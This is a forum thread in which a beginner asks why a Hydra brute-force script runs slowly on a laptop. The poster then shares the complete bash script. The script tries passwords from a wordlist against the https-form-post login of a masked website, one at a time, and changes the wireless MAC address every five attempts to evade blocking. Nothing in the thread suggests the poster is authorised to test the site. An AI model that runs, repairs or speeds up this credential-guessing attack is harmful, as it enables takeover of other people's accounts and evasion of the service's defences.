I am not sure if it is a good idea post this problem in here or not. But I really need help as I failed to find any in the internet. I made a script to bruteforce using hydra that uses https-form-post method. Instead of passing a whole password list with parameter -P this script takes one password from the list and passes it to hydra with parameter -p and perform some actions in the intervals. When I run this script in my android phone with termux it takes only 3-4 seconds for each passord. But when I use the same script in laptop with kali linux it takes almost 20-30 seconds or even more for each password. Can anyone tell me why is this happening? My android phone is a very old one using android 4 and its ram is around 500mb. On the otherhand my laptop has a ram of 8gb. I tried http-form-post instead of https-form-post and it was quite fast but unfortunately it can not find the credential using http.
That’s great, what language did you use to develop the script? this can shed light on what improvements in terms of threading or performance you can make.
Oops the code was messed up while posting. Actually the command
hydra -V -f -l $user -p $pass www.********.com https-form-post “/login.php:&email=^USER^&pass=^PASS^:S=302 Found” is taking the most time. I tried to run only this command in my terminal giving specific username and password instead of $user and $pass and still it takes a lot of time to complete a single task.
Well let me share the code for you. By the way I am just a beginner so my coding might give you a headache.
#!/usr/bin/bash
echo Enter Username/Email
read user
echo Enter the wordlist Filename/Directory
read file
declare -i mvar=0
declare -i counter=0
nofline=$(wc -l < $file)
main(){
echo ‘Do you want to randomly select password from the wordlist.(y/n)’
read shuffler
rm -r hydra.restore
clear
if [ $shuffler == y ] || [ $shuffler == Y ];then
entries=$(shuf -i 1-$nofline)
rm -r fbhlog.txt
rm -r hydra.restore
for entry in $entries;do
mvar=$mvar+1
if [ $mvar -eq 5 ]
then
ifconfig wlan0 down
macchanger -r wlan0
ifconfig wlan0 up
sleep 1s
mvar=0
fi >> fbhlog.txt
lineno=$entry'q;d'
pass=$(sed $lineno $file)
counter=$counter+1
echo "Trying $pass ($counter/$nofline)..................."
hydra -V -f -l $user -p $pass www.*********.com https-form-post “/login.php:&email=^USER^&pass=^PASS^:S=302 Found” >> fbhlog.txt
if grep -q 'valid pair found' fbhlog.txt;then
echo $(tput setaf 5)'>>>>>>>>>>>>>>>>>>>>>>>>>>>Password found<<<<<<<<<<<<<<<<<<<<<<<<<<<<'$(tput sgr0)
echo Password for username $(tput setaf 3)$user $(tput sgr0)is $(tput setaf 3)$pass$(tput sgr0)
break
elif [ $counter == $nofline ];then
echo $(tput setaf 6)'__________________Password not found. Better luck next time_______________________'$(tput sgr0)
fi
done
elif [ $shuffler == n ] || [ $shuffler == N ];then
rm -r fbhlog.txt
while read pass;do
mvar=$mvar+1
if [ $mvar -eq 5 ]
then
ifconfig wlan0 down
macchanger -r wlan0
ifconfig wlan0 up
sleep 1s
mvar=0
fi >> fbhlog.txt
counter=$counter+1
echo "Trying $pass ($counter/$nofline)..................."
hydra -V -f -l $user -p $pass www.********.com https-form-post "/login.php:&email=^USER^&pass=^PASS^:S=302 Found" >> fbhlog.txt
if grep -q 'valid pair found' fbhlog.txt;then
echo $(tput setaf 5)'>>>>>>>>>>>>>>>>>>>>>>>>>>>Password found<<<<<<<<<<<<<<<<<<<<<<<<<<<<'$(tput sgr0)
echo Password for username $(tput setaf 3)$user $(tput sgr0)is $(tput setaf 3)$pass$(tput sgr0)
break
elif [ $counter == $nofline ];then
echo $(tput setaf 6)'__________________Password not found. Better luck next time_______________________'$(tput sgr0)
fi
done < $file
else
echo ‘---------------------Invalid input. Type the correct letter-------------------------’
main
fi
}